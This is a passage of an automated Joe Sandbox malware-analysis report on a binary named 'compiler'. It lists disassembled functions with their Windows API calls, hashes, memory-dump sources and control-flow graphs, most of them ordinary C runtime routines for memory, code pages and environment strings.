                                                            • String ID: cdata<%s>: %d$cdata<%s>: %p$ctype<%s>
                                                            • API String ID: 2941638530-613915905
                                                            • Opcode ID: 08d394e2e8320ac1b43fe76137978c90c43e74420b673c77cdc7302fc2bbc485
                                                            • Instruction ID: da711355e6deff520c1e32fb222d248516755193da4f4b9502bf98f3d3412fce
                                                            • Opcode Fuzzy Hash: 08d394e2e8320ac1b43fe76137978c90c43e74420b673c77cdc7302fc2bbc485
                                                            • Instruction Fuzzy Hash: 4DE1BB22B08A4582FB14BB1AD4503BCA3A0FB66B84F944176EF5D8779DDF3DE4528360
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD46870 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • LoadLibraryExA.KERNELBASE(?,?,?,00007FF7BAD39E7B,?,?,?,?,?,?,00000000,?,?,00007FF7BAD3E360), ref: 00007FF7BAD46891
                                                            • GetProcAddressForCaller.KERNELBASE(?,?,?,00007FF7BAD39E7B,?,?,?,?,?,?,00000000,?,?,00007FF7BAD3E360), ref: 00007FF7BAD468AA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: AddressCallerLibraryLoadProc
                                                            • String ID: SystemFunction036$advapi32.dll
                                                            • API String ID: 4215043672-1354007664
                                                            • Opcode ID: 68472491d10acbd87ac19bde7c6dd0bbaf31ac41a68eb6f5cf41694a134f0d4b
                                                            • Instruction ID: 2f7068062b127d57cadf78891c4f8567294cda633f4b1537bf542e57ce211c0e
                                                            • Opcode Fuzzy Hash: 68472491d10acbd87ac19bde7c6dd0bbaf31ac41a68eb6f5cf41694a134f0d4b
                                                            • Instruction Fuzzy Hash: 9F111961A05B4281FF04BB19E445365A3A1EF7AB44FC408B4CE0E0A39CEE7CD49582A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADB8058 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: String$try_get_function
                                                            • String ID: LCMapStringEx
                                                            • API String ID: 1203122356-3893581201
                                                            • Opcode ID: 8a7a115700303e1bcef7722147143826319c5b99711f11308b318790f71eea05
                                                            • Instruction ID: cf0f93739605837e09bf4c5a58d621f46066fca9d9f435cdfc622118d5b4aad8
                                                            • Opcode Fuzzy Hash: 8a7a115700303e1bcef7722147143826319c5b99711f11308b318790f71eea05
                                                            • Instruction Fuzzy Hash: 5B111A32A08B8186E760EB09F4402AAB7A4F79AB94F944135EF8D43B1DDF3CD5508B40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD48050 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 503 7ff7bad48050-7ff7bad48070 GetLastError 504 7ff7bad480cb-7ff7bad480d3 SetLastError 503->504 505 7ff7bad48072-7ff7bad48089 VirtualQuery 503->505 506 7ff7bad480d5-7ff7bad480e4 504->506 507 7ff7bad4808b-7ff7bad48090 505->507 508 7ff7bad480e5-7ff7bad480e8 505->508 507->508 509 7ff7bad48092-7ff7bad48097 507->509 508->506 509->508 510 7ff7bad48099-7ff7bad480a1 509->510 510->508 511 7ff7bad480a3-7ff7bad480a8 510->511 511->508 512 7ff7bad480aa-7ff7bad480bd VirtualFree 511->512 512->508 513 7ff7bad480bf-7ff7bad480c9 512->513 513->504 513->505
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastVirtual$FreeQuery
                                                            • String ID:
                                                            • API String ID: 2187276999-0
                                                            • Opcode ID: 08204fa2b3748c7be1f8c377aa6b35ea1f8be9d5e35c77a80b3059f6e634a443
                                                            • Instruction ID: 7c2e8ce8d714a81a2e3d266fafffb2b38aa66fb10a0f289c821fe69c960453b8
                                                            • Opcode Fuzzy Hash: 08204fa2b3748c7be1f8c377aa6b35ea1f8be9d5e35c77a80b3059f6e634a443
                                                            • Instruction Fuzzy Hash: 97112131B28B4241FA60BB19A40023EE7A0FB5ABD4F9845B5DF9D4269CDF3CD5548750
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADA9968 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 585863094f20753905da77fae0c2c96fe1fe2c63e522e6c690d79830f8462474
                                                            • Instruction ID: 7dfd0a87a3a3028ee3441150f4d20b117e3f165f6732143d985e28773ebc2a59
                                                            • Opcode Fuzzy Hash: 585863094f20753905da77fae0c2c96fe1fe2c63e522e6c690d79830f8462474
                                                            • Instruction Fuzzy Hash: 99E04F60B0430152FB147B29988537D6262EFA6741FD098BCDF4F0335EDD3DE85982A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD48638 Relevance: 3.8, APIs: 3, Instructions: 48memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 561 7ff7bad48638-7ff7bad48658 562 7ff7bad4865e-7ff7bad48697 GetLastError VirtualAlloc SetLastError 561->562 563 7ff7bad486df 561->563 562->563 564 7ff7bad48699-7ff7bad486dd 562->564 565 7ff7bad486e1-7ff7bad486f0 563->565 564->565
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$AllocVirtual
                                                            • String ID:
                                                            • API String ID: 1225938287-0
                                                            • Opcode ID: e9b21f7a05337cf3fb1cf3c25e058ce6d924ddb4fb06cc0e3eeffff37cc4a889
                                                            • Instruction ID: 858c760cc9fe6a501897fc985f5b4d07aabcc44a82cc31dd8e2ca5a8c5c8d4c4
                                                            • Opcode Fuzzy Hash: e9b21f7a05337cf3fb1cf3c25e058ce6d924ddb4fb06cc0e3eeffff37cc4a889
                                                            • Instruction Fuzzy Hash: C811BCB2B15A8081EB14AB68E44436AB2A0F705BF4F908778CB7E07BDCDF28C5568340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD490F0 Relevance: 3.8, APIs: 3, Instructions: 21memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00000000,00007FF7BAD4870D,?,?,00000000,00007FF7BAD39E9D,?,?,?,?,?,?,00000000), ref: 00007FF7BAD490FD
                                                            • VirtualAlloc.KERNELBASE(?,?,00000000,00007FF7BAD4870D,?,?,00000000,00007FF7BAD39E9D,?,?,?,?,?,?,00000000), ref: 00007FF7BAD49116
                                                            • SetLastError.KERNEL32(?,?,00000000,00007FF7BAD4870D,?,?,00000000,00007FF7BAD39E9D,?,?,?,?,?,?,00000000), ref: 00007FF7BAD49121
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$AllocVirtual
                                                            • String ID:
                                                            • API String ID: 1225938287-0
                                                            • Opcode ID: 010c33f1fe3f08f60b9f60e0d5542db454369c14a8d242bc09e4ef4b45aa47b9
                                                            • Instruction ID: cbb999a2e89c3e891288f2711886112fc1ce422665a26f7c2d2ee038f16160e0
                                                            • Opcode Fuzzy Hash: 010c33f1fe3f08f60b9f60e0d5542db454369c14a8d242bc09e4ef4b45aa47b9
                                                            • Instruction Fuzzy Hash: 5AE0D86171464192FE142B66B404219E260AB59BF0F884738DF3E073D9DE3CC4544380
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADC49B8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 125COMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: Info
                                                            • String ID:
                                                            • API String ID: 1807457897-3916222277
                                                            • Opcode ID: ce36e4cfe7bde69f8e8a1f815b20d844b4a9b38d6cdcf09269259677f3ea91e0
                                                            • Instruction ID: 27a4ec66b014e39cf3c9abef125df12c1a67e99d6a4ac7edc20c1c362dfa6770
                                                            • Opcode Fuzzy Hash: ce36e4cfe7bde69f8e8a1f815b20d844b4a9b38d6cdcf09269259677f3ea91e0
                                                            • Instruction Fuzzy Hash: BD51E372A1C68086F720AF28D0483ADBBA1F759B48F944175EB8D4764EDF2CD545CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADB796C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 602 7ff7badb796c-7ff7badb798f call 7ff7badb7794 604 7ff7badb7994-7ff7badb7997 602->604 605 7ff7badb79af-7ff7badb79b9 604->605 606 7ff7badb7999-7ff7badb79a8 604->606 606->605
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: try_get_function
                                                            • String ID: AppPolicyGetProcessTerminationMethod
                                                            • API String ID: 2742660187-2031265017
                                                            • Opcode ID: 827bce8d22a728e387f64c933b16d69fe6891ca33f19dbbb5c98fbabb39afe60
                                                            • Instruction ID: 43a1947d41eaa159fa2db86d9956e2f7f0c92d6a72e995651e1bf606dcc71850
                                                            • Opcode Fuzzy Hash: 827bce8d22a728e387f64c933b16d69fe6891ca33f19dbbb5c98fbabb39afe60
                                                            • Instruction Fuzzy Hash: 1FE04851E0660691FF147769A4001B05211DF6A774ECC43B1DF7C063DC9D2CA5D58250
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADC4E94 Relevance: 3.2, APIs: 2, Instructions: 194COMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 607 7ff7badc4e94-7ff7badc4ec5 call 7ff7badc48a8 610 7ff7badc511e-7ff7badc5121 call 7ff7badc4928 607->610 611 7ff7badc4ecb-7ff7badc4ed8 607->611 614 7ff7badc5126 610->614 613 7ff7badc4edb-7ff7badc4edd 611->613 615 7ff7badc5031-7ff7badc505e call 7ff7bad8cbb0 613->615 616 7ff7badc4ee3-7ff7badc4eee 613->616 617 7ff7badc5128-7ff7badc514c call 7ff7bad8be60 614->617 624 7ff7badc5061-7ff7badc5067 615->624 616->613 618 7ff7badc4ef0-7ff7badc4ef6 616->618 621 7ff7badc5029-7ff7badc502c 618->621 622 7ff7badc4efc-7ff7badc4f07 IsValidCodePage 618->622 621->617 622->621 626 7ff7badc4f0d-7ff7badc4f14 622->626 627 7ff7badc5069-7ff7badc506c 624->627 628 7ff7badc50a7-7ff7badc50b1 624->628 629 7ff7badc4f16-7ff7badc4f24 626->629 630 7ff7badc4f44-7ff7badc4f53 GetCPInfo 626->630 627->628 632 7ff7badc506e-7ff7badc5079 627->632 628->624 635 7ff7badc50b3-7ff7badc50bf 628->635 631 7ff7badc4f28-7ff7badc4f3a call 7ff7badc49b8 629->631 633 7ff7badc4f59-7ff7badc4f79 call 7ff7bad8cbb0 630->633 634 7ff7badc501d-7ff7badc5023 630->634 643 7ff7badc4f3f 631->643 637 7ff7badc509f-7ff7badc50a5 632->637 638 7ff7badc507b 632->638 650 7ff7badc4f7f-7ff7badc4f88 633->650 651 7ff7badc5013 633->651 634->610 634->621 640 7ff7badc50c1-7ff7badc50c4 635->640 641 7ff7badc50ea 635->641 637->627 637->628 644 7ff7badc507f-7ff7badc5086 638->644 646 7ff7badc50e1-7ff7badc50e8 640->646 647 7ff7badc50c6-7ff7badc50c9 640->647 642 7ff7badc50f1-7ff7badc5104 641->642 648 7ff7badc5108-7ff7badc5117 642->648 643->614 644->637 649 7ff7badc5088-7ff7badc509d 644->649 646->642 652 7ff7badc50d8-7ff7badc50df 647->652 653 7ff7badc50cb-7ff7badc50cd 647->653 648->648 654 7ff7badc5119 648->654 649->637 649->644 655 7ff7badc4fb6-7ff7badc4fba 650->655 656 7ff7badc4f8a-7ff7badc4f8d 650->656 657 7ff7badc5015-7ff7badc5018 651->657 652->642 653->642 658 7ff7badc50cf-7ff7badc50d6 653->658 654->610 660 7ff7badc4fbf-7ff7badc4fc8 655->660 656->655 659 7ff7badc4f8f-7ff7badc4f98 656->659 657->631 658->642 661 7ff7badc4f9a-7ff7badc4f9f 659->661 662 7ff7badc4fae-7ff7badc4fb4 659->662 660->660 663 7ff7badc4fca-7ff7badc4fd3 660->663 666 7ff7badc4fa2-7ff7badc4fac 661->666 662->655 662->656 664 7ff7badc4fd5-7ff7badc4fd8 663->664 665 7ff7badc5003 663->665 667 7ff7badc4ffa-7ff7badc5001 664->667 668 7ff7badc4fda-7ff7badc4fdd 664->668 669 7ff7badc500a-7ff7badc5011 665->669 666->662 666->666 667->669 670 7ff7badc4ff1-7ff7badc4ff8 668->670 671 7ff7badc4fdf-7ff7badc4fe1 668->671 669->657 670->669 672 7ff7badc4fe3-7ff7badc4fe6 671->672 673 7ff7badc4fe8-7ff7badc4fef 671->673 672->669 673->669
                                                            APIs
                                                              • Part of subcall function 00007FF7BADC48A8: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF7BADC4BCC,?,?,?,?,00000000,COMSPEC,?,00007FF7BADC4E6A), ref: 00007FF7BADC48D2
                                                            • IsValidCodePage.KERNEL32(?,00000001,?,?,00000000,00000001,?,00007FF7BADC4C7F,?,?,?,?,00000000,COMSPEC,?,00007FF7BADC4E6A), ref: 00007FF7BADC4EFF
                                                            • GetCPInfo.KERNEL32(?,00000001,?,?,00000000,00000001,?,00007FF7BADC4C7F,?,?,?,?,00000000,COMSPEC,?,00007FF7BADC4E6A), ref: 00007FF7BADC4F4B
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: CodeInfoPageValid
                                                            • String ID:
                                                            • API String ID: 546120528-0
                                                            • Opcode ID: 2584616879bbd7011dc4075d1c01b300507de34879c9d61ba64844993e5e8c97
                                                            • Instruction ID: cf92e073f18c8dc306927c8b83c0a72fde1a78d4b4b93fdfbcee30bd574ff62b
                                                            • Opcode Fuzzy Hash: 2584616879bbd7011dc4075d1c01b300507de34879c9d61ba64844993e5e8c97
                                                            • Instruction Fuzzy Hash: 548137A2A0C28252F725BF2DD004179F791EB66740FC881B6DF8E4769DEE3DE54193A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADA9D6C Relevance: 3.2, APIs: 2, Instructions: 187COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: c6ba314dbed79af2a449442d488590df858fb126267994840acb2f60592c4bf6
                                                            • Instruction ID: ff73ded73fb9979fca2bb4e178fb0a26fc87a1f94620cca037d26583e27f603b
                                                            • Opcode Fuzzy Hash: c6ba314dbed79af2a449442d488590df858fb126267994840acb2f60592c4bf6
                                                            • Instruction Fuzzy Hash: 8061D421A0A68145FA74BE2DD40477EE680EF66BA8F844271EF6D077CDCF3CE5518620
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADC51DC Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,00000001,00007FF7BADB4E73,?,?,COMSPEC,00007FF7BADB5136), ref: 00007FF7BADC51F5
                                                            • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,00000001,00007FF7BADB4E73,?,?,COMSPEC,00007FF7BADB5136), ref: 00007FF7BADC52B9
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentStrings$Free
                                                            • String ID:
                                                            • API String ID: 3328510275-0
                                                            • Opcode ID: 43bcb3a514b697c9769ebe56e316c910ae962025b882180c1b6f1b66d3309fc5
                                                            • Instruction ID: f8bf9febcbff4d7ce3cfd4f77475f349780b5c19359170747e0ef88740c05901
                                                            • Opcode Fuzzy Hash: 43bcb3a514b697c9769ebe56e316c910ae962025b882180c1b6f1b66d3309fc5
                                                            • Instruction Fuzzy Hash: 1D218421E5875281FA20BF196400029E6E4FBA5BD0BD84174EF8E23B9DEF3CE4528750
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADBBBC0 Relevance: 3.1, APIs: 2, Instructions: 55COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF7BADBBAF3,?,?,00000000,00007FF7BADBBB9B,?,?,?,?,?,?,00007FF7BADA9BB6), ref: 00007FF7BADBBC26
                                                            • GetLastError.KERNEL32(?,?,?,00007FF7BADBBAF3,?,?,00000000,00007FF7BADBBB9B,?,?,?,?,?,?,00007FF7BADA9BB6), ref: 00007FF7BADBBC30
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ChangeCloseErrorFindLastNotification
                                                            • String ID:
                                                            • API String ID: 1687624791-0
                                                            • Opcode ID: 6826493c4fcfaa1b49cd040f5d8db0964a1505d3b6970945f02aaba9743996cc
                                                            • Instruction ID: 799f21cb44b41b5dfbb028275256b3c89856425f56d082c4a3ce924667b581b7
                                                            • Opcode Fuzzy Hash: 6826493c4fcfaa1b49cd040f5d8db0964a1505d3b6970945f02aaba9743996cc
                                                            • Instruction Fuzzy Hash: F711CD10F0864251FF90B32E969837C9292DF677A0FC403B8EF2E462DEDE6CA4418220
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD61140 Relevance: 3.1, APIs: 2, Instructions: 52memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,00007FF7BAD6DF1D,?,?,?,?,00007FF7BAD72701,?,?,?), ref: 00007FF7BAD6117C
                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,00007FF7BAD6DF1D,?,?,?,?,00007FF7BAD72701,?,?,?), ref: 00007FF7BAD611E0
                                                              • Part of subcall function 00007FF7BAD61388: VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,?,00007FF7BAD45B5A), ref: 00007FF7BAD613B5
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 7339188c58023be2479cba8159bf358a7a2be14a0a8b23e3be6f5dbb5fe15afe
                                                            • Instruction ID: 9949115a232ca6af4c102302a2b4ac331e25caaa8a78d7c5a80964c904db4d60
                                                            • Opcode Fuzzy Hash: 7339188c58023be2479cba8159bf358a7a2be14a0a8b23e3be6f5dbb5fe15afe
                                                            • Instruction Fuzzy Hash: FA119051B0894280FE54BB5ED444769A261EB22BC8FD84072EF0D87A8CDE2CD4858360
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD3CF04 Relevance: 2.6, APIs: 2, Instructions: 122COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
